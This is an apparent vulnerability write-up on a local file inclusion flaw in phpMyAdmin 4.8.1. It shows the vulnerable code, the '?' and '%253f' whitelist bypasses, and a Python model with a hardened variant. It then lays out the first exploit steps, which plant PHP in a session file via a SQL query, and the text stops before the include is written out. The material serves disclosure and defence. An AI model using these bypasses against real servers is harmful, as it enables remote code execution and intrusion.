Author: @Ambulong

Security team ChaMd5 disclosed a Local File Inclusion vulnerability in phpMyAdmin 4.8.1, the latest version at the time, and exploiting it can lead to Remote Code Execution. In this article, we use VulnSpy’s online phpMyAdmin environment to demonstrate the exploit of this vulnerability.

VulnSpy’s online phpMyAdmin environment address: http://www.vulnspy.com/phpmyadmin-4.8.1/

Vulnerability Details

1. Lines 54-63 in file /index.php:

```php
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    // the raw request value is included, not the value that was validated
    include $_REQUEST['target'];
    exit;
}
```

2. Core::checkPageValidity in /libraries/classes/Core.php:

```php
public static function checkPageValidity(&$page, array $whitelist = [])
{
    if (empty($whitelist)) {
        $whitelist = self::$goto_whitelist;
    }
    if (! isset($page) || ! is_string($page)) {
        return false;
    }

    if (in_array($page, $whitelist)) {
        return true;
    }

    // keep only the part before the first '?' (the whole string if there is none)
    $_page = mb_substr(
        $page,
        0,
        mb_strpos($page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }

    // decode once more, then truncate at '?' again
    $_page = urldecode($page);
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }

    return false;
}
```

2018-06-25 Update:

Core::checkPageValidity can be bypassed by using double encoding like %253f.

Core::checkPageValidity can be bypassed by using db_sql.php?.

Thanks to OJ Reeves’s report: we don’t need to encode ?. Sorry for that mistake.

2018-11-23 Update:

Core::checkPageValidity can be bypassed by using db_sql.php?. On Windows, a path containing ‘?’ is considered an invalid path, so there Core::checkPageValidity has to be bypassed by using double encoding like %253f. REF: Naming Files, Paths, and Namespaces

Thanks to m3lon’s report: we need to encode ? on Windows.
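The truncation at ‘?’ in Core::checkPageValidity and the single- versus double-encoding difference described in the updates, as an added Python model (this is not phpMyAdmin’s code; the whitelist/blacklist contents and the hardened variant are assumptions made for illustration):

```python
import re
import urllib.parse

# Constructed subset of Core::$goto_whitelist and index.php's $target_blacklist.
# The real lists are longer; these entries are illustrative only.
GOTO_WHITELIST = ["db_sql.php", "server_sql.php", "tbl_sql.php"]
TARGET_BLACKLIST = ["import.php", "export.php"]


def check_page_validity(page, whitelist=GOTO_WHITELIST):
    """Port of the vulnerable Core::checkPageValidity (phpMyAdmin 4.8.1).

    `page` is the value as it sits in $_REQUEST, i.e. PHP has already
    URL-decoded it once, which is why %253f in the URL arrives here as %3f.
    mb_substr(..., mb_strpos($page . '?', '?')) keeps everything before the
    first '?', or the whole string when there is none.
    """
    if not isinstance(page, str):
        return False
    if page in whitelist:
        return True
    if page[: (page + "?").index("?")] in whitelist:
        return True
    decoded = urllib.parse.unquote(page)  # urldecode($page): %3f -> ?
    return decoded[: (decoded + "?").index("?")] in whitelist


def target_included_by_index_php(target):
    """Mirrors index.php lines 54-63: returns what `include $_REQUEST['target']`
    receives, or None when the request is rejected. The defect: validation
    only looks at the part before '?', but the include gets the full string."""
    if not target or re.match(r"^index", target) or target in TARGET_BLACKLIST:
        return None
    return target if check_page_validity(target) else None


def target_included_hardened(target):
    """Assumed hardening (not the upstream patch): decode once, require the
    ENTIRE value to be a whitelist entry, and hand the include the canonical
    whitelist entry instead of the raw request value."""
    decoded = urllib.parse.unquote(target or "")
    if decoded in GOTO_WHITELIST and decoded not in TARGET_BLACKLIST:
        return decoded
    return None
```

Detection-wise, the same mismatch shows up in web logs as a `target` parameter that passes validation yet contains ‘?’, ‘%3f’ or ‘..’ after a whitelisted file name.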

Exploit

An attacker can use this vulnerability to include a session file, turning the Local File Inclusion into Remote Code Execution.

1. Log into phpMyAdmin with username root and password toor.

2. Run the SQL query:

```sql
select '<?php phpinfo();exit;?>'
```

3. Get your session ID

The session ID is the value of the cookie named phpMyAdmin in your browser.

4. Include the session file